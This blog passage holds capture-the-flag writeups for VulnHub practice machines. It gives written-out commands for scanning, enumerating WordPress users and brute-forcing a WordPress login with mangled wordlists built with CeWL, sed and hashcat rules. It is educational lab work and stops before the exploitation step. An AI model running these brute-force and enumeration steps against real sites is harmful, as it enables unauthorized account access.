<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/root-02_zpssvmh4ben.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/root-02_zpssvmh4ben.png" height="185" width="400" /></a></div>
<i>fuckyeah</i><br />
<i>After reading the writeup by the author, (found here <a href="https://github.com/d4rc0d3x/ctfs/blob/master/writeups/vulnhub/VulnOSv2/README.md" target="_blank">https://github.com/d4rc0d3x/ctfs/blob/master/writeups/vulnhub/VulnOSv2/README.md</a>)</i><br />
<i>I noted that he did use the 37292.c exploit by compiling it on the actual victim.. n00b as I am I thought that using precompiled would be easier.. now I know that it's also possible (better?) to compile on the victim..</i><br />
<i>But as a trusty THS member asked me the other day; has the pre-compiled exploit from kernel-exploits.com failed where the exploit-db ones have succeeded.. Not sure but think not..</i><br />
<i>Still, valuable lesson learned.</i><br />
<br />
<br />
<b><span style="color: yellow;">TIFU</span></b><br />
<b><span style="color: yellow;">=====</span></b><br />
Now.. this is where it gets embarrassing... In the past couple of VMs I have done where root was the goal, flags were often found in the /root directory.. so I have no idea why I first decided it would be a good idea to check the /home/vulnosadmin directory.. but I did..<br />
<br />
and found the file r00t.blend<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/blend-01_zpszqa45svq.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/blend-01_zpszqa45svq.png" height="320" width="640" /></a></div>
My first reaction was: this is it, this is an extra step to the flag..<br />
But what is r00t.blend..<br />
<span style="color: lime;">file r00t.blend</span><br />
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/file-01_zpsgnr0kelj.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/file-01_zpsgnr0kelj.png" height="83" width="400" /></a></div>
<br /></div>
<i>it's a Blender3d file</i><br />
<i>OK, wtf is that..</i><br />
> Googled<br />
> Downloaded blender<br />
> opened the file<br />
dafuq..<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/r00t-blend-01_zps0qafrvvu.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/r00t-blend-01_zps0qafrvvu.jpg" height="342" width="640" /></a></div>
> got a tantalising glimpse of what appeared to be a sequence of letters when slightly moving the cube<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/r00t-blend-02_zpsgfhtcyo1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/r00t-blend-02_zpsgfhtcyo1.jpg" height="342" width="640" /></a></div>
<br />
> spent 15 minutes watching youtube videos on how the hell this proggy is supposed to work when using a touchpad..<br />
<br />
> With some keyboard mashing and some vague touchpad movements was able to get this beauty..<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/r00t-blend-03_zpsot3f5m1d.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/r00t-blend-03_zpsot3f5m1d.jpg" height="292" width="400" /></a></div>
<br />
<i>Uhh, OK.. </i><br />
<i>Doesn't read much like a flag.. is it a password for another file ?</i><br />
<br />
Time to check around the other directories for files of interest which may be password protected?!<br />
<br />
<span style="color: lime;">ls -la root/</span><br />
uhh.. flag.txt ?? God dammit TAPE .. lol :D<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/picard-double-facepalm-5_zpsdmux9oqv.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/picard-double-facepalm-5_zpsdmux9oqv.jpg" height="302" width="400" /></a></div>
<br />
<i>double facepalm</i><br />
<br />
I just wasted more time on either a random lost file, or a cunningly placed red herring :)<br />
<br />
<span style="color: lime;">cat root/flag.txt</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/flag_zpsz8ik7n0e.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/flag_zpsz8ik7n0e.png" height="220" width="400" /></a></div>
<br />
<i>Job Done :)</i><br />
<br />
<b><span style="color: yellow;">So.. lessons learned;</span></b><br />
<b><span style="color: yellow;">================</span></b><br />
1. If an exploit says something is vulnerable to SQLi, see whether you can dump databases before going batshit crazy on other hypothetical entry points..<br />
<br />
2. Carefully check your SQLi / sqlmap syntax.. missing quotes, slightly-off parameters will ruin your day..<br />
<br />
3. By all means note interesting files for future reference, but check other directories for interesting files as well before going all out on checking a single file when possibly others are out there.. lol..<br />
<br />
4. I dig Anime chicks :D<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/kusanagi_zpsmc5798qq.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/CTF/kusanagi_zpsmc5798qq.jpg" height="320" width="213" /></a></div>
<br />
<i>kusanagi.jpg from the OpenDocMan file manager</i><br />
<br />
Big thanks to c4b3rw0lf for the time invested in creating this fun challenge and big Up to VulnHub.com for hosting these challenges.<br />
<br />
<br /></div>
<b>VulnHub -- SecTalks: BNE0x00 - Minotaur -- Writeup</b> (2016-05-11)<br /><div dir="ltr" style="text-align: left;" trbidi="on">
<br />
So I had a crack at another VM from <a href="http://vulnhub.com/">vulnhub.com</a> called <a href="https://www.vulnhub.com/entry/sectalks-bne0x00-minotaur,139/" target="_blank">minotaur </a>and thought I would post<br />
my processes and failures on it !<br />
It's a fairly long and detailed post (image heavy!) but that's the way I like reading these things.. soo.. ;)<br />
<br />
Hints given ;<br />
<ol style="background-color: #f7f7f7; color: #333333; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14px; line-height: 20px; margin: 0px 0px 10px 25px; padding: 0px;">
<li style="margin: 0px;">This CTF has a couple of fairly heavy password cracking challenges, and some red herrings.</li>
<li style="margin: 0px;">One password you will need is not on rockyou.txt or any other wordlist you may have out there. So you need to think of a way to generate it yourself.</li>
</ol>
<br />
So starting off with the usual, using netdiscover to find host IP address ;<br />
(as before I use a homebrewed script to save those valuable seconds wasted on a few extra keystrokes.. ;) )<br />
<span style="color: lime;">netdiscover -i eth0 -p -r 192.168.56.0/24</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ranger-01_zpse2cleb7k.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/ranger-01_zpse2cleb7k.png" height="336" width="640" /></a></div>
<br />
Run a quick test for robots.txt (a simple curl request would also do, or viewing output results from an nmap scan, but hey..)<br />
<span style="color: lime;">bash tools/robu.sh</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/robu-01_zps3h1n4fbz.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/robu-01_zps3h1n4fbz.png" height="174" width="640" /></a></div>
<br />
Nothing to see there, so move along to running an nmap scan using zenmap<br />
(I simply prefer the output view in a separate window rather than having it in another terminal window..)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/zenmap-01_zpskq8kyn9e.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/zenmap-01_zpskq8kyn9e.png" height="640" width="632" /></a></div>
<br />
Alright, so 3 open ports;<br />
<b>22</b> --> ssh<br />
<b>80</b> --> http (Apache 2.4.7)<br />
<b>2020</b> --> vsftpd ftp service with anonymous login authorized<br />
<br />
Nothing to see on port 80 but a standard Apache welcome page, and no robots.txt either. I run a quick check with dirb to try some forced browsing, but it turns up empty-handed ..<br />
<span style="color: lime;">dirb http://192.168.56.223</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/dirb-01_zpsk8xusvsz.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/dirb-01_zpsk8xusvsz.png" height="436" width="640" /></a></div>
<br />
A tad disappointed, I decide to run a more detailed check by firing up the (in my case sorely underutilised) OWASP ZAP.<br />
I enter the IP details for a quick scan, which doesn't show much of interest.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/zap-02_zpsdusbsgcl.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/zap-02_zpsdusbsgcl.png" height="392" width="640" /></a></div>
<br />
So I then start a forced browsing attack with the dirbuster directory list wordlist.<br />
(standard wordlist can be edited from; Tools -> Options -> Forced Browse)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/zap-04_zpsd5yg4hmr.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/zap-04_zpsd5yg4hmr.png" height="498" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/zap-03_zpsafldl7v9.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/zap-03_zpsafldl7v9.png" height="392" width="640" /></a></div>
<br />
After a couple of minutes I see the subdirectory "bull" pop up. Yay ! something new to poke at.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/zap-05_zpszdgd96zw.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/zap-05_zpszdgd96zw.png" height="392" width="640" /></a></div>
<br />
Checking out the webpage I am presented with a wordpress blog showing a rather disturbing furry and some seriously roided up cattle..<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/funny-muscle-cow-bull-do-you-even-graze-pics_zpsx93nn3vn.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/funny-muscle-cow-bull-do-you-even-graze-pics_zpsx93nn3vn.jpg" height="249" width="320" /></a></div>
<br />
<i>Ho Lee Fuk.</i><br />
<br />
As the pictures were pretty prominent I decided to first have a quick look there.<br />
The images rotate, so I dig around with inspect element to find the directory from which I can grab them;<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/inspectelement-01_zpsv1xdyxgk.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/inspectelement-01_zpsv1xdyxgk.png" height="530" width="640" /></a></div>
<br />
So the pictures are all located at;<br />
<span style="color: lime;">http://192.168.56.223/bull/wp-content/uploads/slideshow-gallery/</span><br />
<br />
Let's download the pics for further analysis;<br />
<span style="color: lime;">wget -nd -r -l 1 -A jpg http://192.168.56.223/bull/wp-content/uploads/slideshow-gallery/</span><br />
<span style="color: lime;">ls -l *.jpg</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wget-jpg-01_zpsjrblojqx.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wget-jpg-01_zpsjrblojqx.png" height="180" width="640" /></a></div>
<br />
Brief checks on file info / basic stego / extraneous info / exifdata did not turn up anything significant;<br />
checking file information;<br />
<span style="color: lime;">for i in *.jpg ; do file "$i" ; echo ; done</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/fileinfo-01_zps9kzt7ci0.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/fileinfo-01_zps9kzt7ci0.png" height="324" width="640" /></a></div>
<br />
Nope, nothing shocking here..<br />
<br />
checking for interesting data with exiftool;<br />
<span style="color: lime;">for i in *.jpg ; do exiftool "$i" ; echo ; done</span><br />
Nope, nothing interesting there.<br />
<br />
checking if any <a href="http://adaywithtape.blogspot.nl/2013/01/data-obfuscation.html" target="_blank">extraneous info </a>at the end of the files;<br />
<span style="color: lime;">for i in *.jpg ; do hd "$i" | tail -n2 ; echo ; done</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/hd-01_zpslqsgrmtp.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/hd-01_zpslqsgrmtp.png" height="312" width="640" /></a></div>
<br />
Nope.. all ending with the expected FF D9 file trailer<br />
<br />
So I checked whether there is only one file trailer, just to make sure no JPGs are pasted together ;)<br />
(hd prints a double space after every eighth byte, so the pattern has to match both spacings)<br />
<span style="color: lime;">for i in *.jpg ; do echo "$i" ; hd "$i" | egrep -i 'ff d9|ff  d9' ; echo ; done</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/hd-02_zpsbqewkswe.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/hd-02_zpsbqewkswe.png" height="320" width="640" /></a></div>
<div>
<br /></div>
<div>
Seems like all files only have one JPG file trailer, so would appear no jpg pasting going on..</div>
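The same single-trailer check done properly, as an added example that is not part of the original post: instead of grepping a hex dump for FF D9, it walks the JPEG marker segments and reports what follows the real End-Of-Image marker. This matters because an EXIF APP1 segment normally embeds a complete thumbnail JPEG with its own FF D8 / FF D9, so a naive count of FF D9 gives 2 for a perfectly ordinary photo. The sample bytes are constructed for the demonstration.

```python
# Added example (not from the original post): find the real EOI of a JPEG by
# walking its marker segments and report any bytes appended after it. A naive
# FF D9 count is returned too, to show how an EXIF thumbnail confuses it.

EOI, SOS = 0xD9, 0xDA
RST = set(range(0xD0, 0xD8))            # restart markers, no length field
STANDALONE = {0xD8, 0x01} | RST         # SOI, TEM and RSTn carry no length


def _skip_scan(data: bytes, pos: int) -> int:
    """Advance past entropy-coded data. Inside a scan an FF byte is always
    followed by 00 (stuffing), FF (fill) or D0-D7 (restart); anything else is
    the next real marker, so return its offset."""
    while pos + 1 < len(data):
        nxt = data[pos + 1]
        if data[pos] == 0xFF and nxt not in (0x00, 0xFF) and nxt not in RST:
            return pos
        pos += 1
    return len(data)


def jpeg_trailer_info(data: bytes) -> dict:
    """Return the offset of the real EOI, the number of bytes after it, and the
    naive FF D9 count that grepping a hex dump would report."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI")
    pos, eoi_offset = 2, None
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xFF:                  # fill byte in front of a marker
            pos += 1
            continue
        if marker == EOI:
            eoi_offset = pos
            break
        if marker in STANDALONE:
            pos += 2
            continue
        if pos + 4 > len(data):
            raise ValueError("truncated segment header")
        seg_len = int.from_bytes(data[pos + 2:pos + 4], "big")  # includes itself
        pos += 2 + seg_len                  # skip APPn/DQT/DHT/SOF/SOS header whole
        if marker == SOS:
            pos = _skip_scan(data, pos)
    if eoi_offset is None:
        raise ValueError("no EOI marker found")
    return {
        "eoi_offset": eoi_offset,
        "trailing_bytes": len(data) - eoi_offset - 2,
        "naive_eoi_count": data.count(b"\xff\xd9"),
    }


def build_sample(trailer: bytes = b"") -> bytes:
    """Constructed test input: SOI, an APP1 segment embedding a tiny thumbnail
    JPEG (as EXIF does), one minimal SOS scan with a stuffed FF 00, then EOI
    followed by an optional appended trailer."""
    thumb = b"\xff\xd8\xff\xd9"
    app1 = b"\xff\xe1" + (2 + len(thumb)).to_bytes(2, "big") + thumb
    sos = b"\xff\xda" + (3).to_bytes(2, "big") + b"\x01"
    scan = b"\x12\x34\xff\x00\x56"
    return b"\xff\xd8" + app1 + sos + scan + b"\xff\xd9" + trailer


if __name__ == "__main__":
    import sys
    if sys.argv[1:]:
        for path in sys.argv[1:]:
            with open(path, "rb") as fh:
                print(path, jpeg_trailer_info(fh.read()))
    else:
        print("clean :", jpeg_trailer_info(build_sample()))
        print("padded:", jpeg_trailer_info(build_sample(b"appended data")))
```

Run it with one or more .jpg paths to check real files; without arguments it checks the two constructed samples.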
<div>
<br /></div>
<div>
checking if any info hidden with steghide without password;</div>
<span style="color: lime;">for i in *.jpg ; do echo "$i" ; steghide extract -sf "$i" -p "" ; done</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/steghide-01_zpsthcbizsq.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/steghide-01_zpsthcbizsq.png" height="232" width="640" /></a></div>
<div>
<br /></div>
<div>
Nope..</div>
<div>
<br /></div>
<div>
checking files for steghide info with worst 500 password list;</div>
<span style="color: lime;">for x in *.jpg ; do bash tools/stegbrute.sh -i "$x" -w lists/501.txt ; done</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/steghide-02_zpsm8iwevu1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/steghide-02_zpsm8iwevu1.png" height="312" width="640" /></a></div>
<br />
Bah.. Nope..<br />
So although only very basic checks at this point, the only thing out of the ordinary is the comment " * " in the pakistani-bull1905608220146652615.jpg file, and nothing further was identified on that or any of the other files.<br />
<br />
Enough time spent on the images for now, so time to move on..<br />
<br />
<br />
<b>WORDPRESS </b><br />
<b>===========</b><br />
As it is a wordpress site and wordpress is quite frequently in the news with vulnerabilities, let's<br />
try wpscan on the site and see what it spits out;<br />
<span style="color: lime;">wpscan -u http://192.168.56.223/bull/</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wpscan-01_zpswolq5nr0.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wpscan-01_zpswolq5nr0.png" height="604" width="640" /></a></div>
<br />
Oh yeah, this looks more like it..!<br />
<br />
Looking through the information and the named vulnerabilities, the arbitrary file upload vulnerabilities look interesting, but they still need an existing user & password.. boo.. :(<br />
<br />
Well, let's enumerate the site for users;<br />
<span style="color: lime;">wpscan -u http://192.168.56.223/bull/ -e u</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wpscan-02_zpsubpn8k3p.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wpscan-02_zpsubpn8k3p.png" height="170" width="400" /></a></div>
<br />
<i>This info can also easily be found by simply browsing through the blog.</i><br />
<br />
Great! We see user 'bully', a starting point to hacking a way in.<br />
wpscan also has a bruteforce option, so let's run a few wordlists on it..<br />
<br />
<b>BRUTE FORCE ATTACK ON WORDPRESS</b><br />
<b>===================================</b><br />
<span style="color: lime;">wpscan -u 192.168.56.223/bull/ -U bully -w /root/list.txt</span><br />
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wpscan-03_zpsmho7kc6x.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wpscan-03_zpsmho7kc6x.png" height="157" width="400" /></a></div>
<br />
<i>After trying several wordlists, I was constantly presented with similar results.. <b>Booo !</b></i><br />
<i>Time to try harder..</i><br />
<br />
Hmm, no joy with the usual suspects :( Hang on.. the hint did mention that a particular password would not be found in the usual wordlists.. OK, time for plan B.</div>
With the great tool CeWL we can make a focused wordlist based on all text found on the wordpress site, including filenames etc.<br />
<span style="color: lime;">cewl -d 5 -a -e http://192.168.56.223/bull/ -w kewl.txt</span><br />
Let's go and kick ass with our new found awesome wordlist!<br />
<span style="color: lime;">wpscan -u 192.168.56.223/bull/ -U bully -w /root/kewl.txt</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bf-03_zpslawrduau.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bf-03_zpslawrduau.png" height="140" width="400" /></a></div>
<br />
<i>aaah, still no joy..</i><br />
<br />
OK, before we lose faith let's beef up (lol pun intended) the wordlist in stages.<br />
(correctly or incorrectly, I prefer starting with small lists and gradually going larger and larger instead of starting off with a huge list).<br />
As we are starting with a small wordlist, we can make certain string manipulations easily without creating a monster;<br />
- Letter case manipulation<br />
- Basic 'leetspeak' alterations<br />
<i>(Depending on how many character alterations you consider, that can however massively increase wordlist size, see an example of permutation possibilities with Gitsnik's awesome permute.pl script <a href="http://adaywithtape.blogspot.nl/2011/07/wordlist-manipulation-revisited.html" target="_blank">here</a>)</i><br />
<br />
Letter case manipulation can be done with simple sed / tr commands;<br />
<span style="color: lime;">cat kewl.txt > new.txt</span><br />
<span style="color: lime;">cat kewl.txt | sed -e 's/^./\u&/' >> new.txt</span><br />
<span style="color: lime;">cat kewl.txt | sed -e 's/.$/\u&/' >> new.txt</span><br />
<span style="color: lime;">cat kewl.txt | tr '[:lower:]' '[:upper:]' >> new.txt</span><br />
<span style="color: lime;">cat kewl.txt | tr '[:upper:]' '[:lower:]' >> new.txt</span><br />
<span style="color: lime;">cat kewl.txt | tr 'a-z A-Z' 'A-Z a-z' >> new.txt</span><br />
<div>
<span style="color: lime;">cat new.txt | sort | uniq > new1.txt</span></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/case-02_zpsqpjbf8ce.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/case-02_zpsqpjbf8ce.png" height="568" width="640" /></a></div>
<br />
Alright lets run the new and improved wordlist ! </div>
<div>
<span style="color: lime;">wpscan -u 192.168.56.223/bull/ -U bully -w /root/new1.txt</span></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bf-01_zpsseer8aqm.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bf-01_zpsseer8aqm.png" height="140" width="400" /></a></div>
<br />
<i>crap..</i><br />
<br />
OK, let's include some basic leetspeak alterations based on the most used </div>
<div>
leetspeak permutations of a / e / l / o / t ;<br />
<span style="color: lime;">cat new1.txt | sed -e 's/a/4/g' -e 's/A/4/g' >> new-leet.txt</span><br />
<span style="color: lime;">cat new1.txt | sed -e 's/e/3/g' -e 's/E/3/g' >> new-leet.txt</span><br />
<span style="color: lime;">cat new1.txt | sed -e 's/l/1/g' -e 's/L/1/g' >> new-leet.txt</span><br />
<span style="color: lime;">cat new1.txt | sed -e 's/o/0/g' -e 's/O/0/g' >> new-leet.txt</span><br />
<div>
<span style="color: lime;">cat new1.txt | sed -e 's/t/7/g' -e 's/T/7/g' >> new-leet.txt</span><br />
<span style="color: lime;">cat new1.txt | sed -e 's/a/4/g' -e 's/A/4/g' -e 's/e/3/g' -e 's/E/3/g' -e 's/l/1/g' -e 's/L/1/g' -e 's/o/0/g' -e 's/O/0/g' -e 's/t/7/g' -e 's/T/7/g' >> new-leet.txt</span></div>
<div>
<span style="color: lime;">cat new-leet.txt | sort | uniq > new.txt</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/case-03_zpsijjw0p8d.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/case-03_zpsijjw0p8d.png" height="640" width="571" /></a></div>
<div>
<br /></div>
<br />
This method of 'leetifying' is not perfect (it swaps all or none of a given letter, never just some), but it's a decent start.<br />
<br />
Alright ! Now this wordlist is pretty pimped, surely now more success will be granted!<br />
<span style="color: lime;">wpscan -u 192.168.56.223/bull/ -U bully -w /root/new1.txt</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bf-02_zpsdlrihhtw.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bf-02_zpsdlrihhtw.png" height="140" width="400" /></a></div>
<br />
<i>fuckfuckfuck</i><br />
<br />
well that was a letdown.<br />
<br />
I was rather disappointed I wasn't getting anywhere with this approach, as it means we now need to consider adding/modifying common characters/phrases, which starts getting pretty theoretical.<br />
Anyway, time for a new plan..<br />
<br />
<b><i>USING RULESETS</i></b><br />
<b><i>===============</i></b><br />
When bruteforcing a hash using hashcat, you can use a set of rules which do word manipulations on the fly. This avoids creating enormous wordlists and has proven very successful in cracking passwords.<br />
But.. no such luxury in this case, as wpscan needs an actual wordlist, so I need to get the stdout from the hashcat rules.<br />
This option is not possible using cudaHashcat or oclHashcat, so I run it on the cpu based hashcat version installed on Kali.<br />
In this case, as the usual suspects (case and basic leetify options) yielded nothing, I decide to go for the T0XlC ruleset, which does some pretty heavy word mangling.<br />
As a last ditch effort I can always look at the other rulesets, including for instance the d3ad0ne ruleset which I know will massively increase wordlist size.. and then, well, back to the drawing board.<br />
<br />
<span style="color: lime;">hashcat -r /usr/share/hashcat/rules/T0XlC.rule kewl.txt --stdout > t0xic.txt</span><br />
<div>
<span style="color: lime;">wc -l t0xic.txt</span></div>
<div>
oofff.. </div>
<div>
lemme sort and check for duplicates</div>
<div>
<span style="color: lime;">cat t0xic.txt | sort | uniq > big.txt</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/toxic-01_zpsowqtm4wx.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/toxic-01_zpsowqtm4wx.png" height="194" width="640" /></a></div>
<div>
<br /></div>
still an <b><i>ooff sheet </i></b>moment, but managed to remove over 600k passphrases.<br />
I would normally cut out short passphrases as well, but since I want to go for broke, I decide to discard my usual methods, leave everything in and just run it.<br />
Oh dear Lord it's slow.. 40 minutes in and it has only done 100,000 passphrases.. reportedly over 7 hours to complete.. omg.. being on VMs certainly does have some disadvantages.<br />
<i>(I would be interested to hear what other wordpress bruteforce tools you pros use, please leave a comment if you have a favourite!)</i><br />
<br />
Anyway I let it run and revisit the other ports and google to see whether any other entry method might suddenly jump out at me.</div>
<div>
Nothing did, so time for a beer and mindless izismile/imgur browsing..<br />
<br /></div>
Suddenly I hear the fan of my lappy quietening down.. oooh.. it hasn't yet been 7 hours.. does this mean the crack has stopped with success?!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bf-success_zpsv6vurwhb.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/bf-success_zpsv6vurwhb.png" height="140" width="400" /></a></div>
<br />
<i>fuckyeah..</i><br />
<br />
YAY!<br />
<br />
<b>GAINING ACCESS</b><br />
<b>================</b><br />
So now we basically can go down 2 roads ;<br />
Either use the metasploit exploit;<br />
<div class="separator" style="clear: both; text-align: center;">
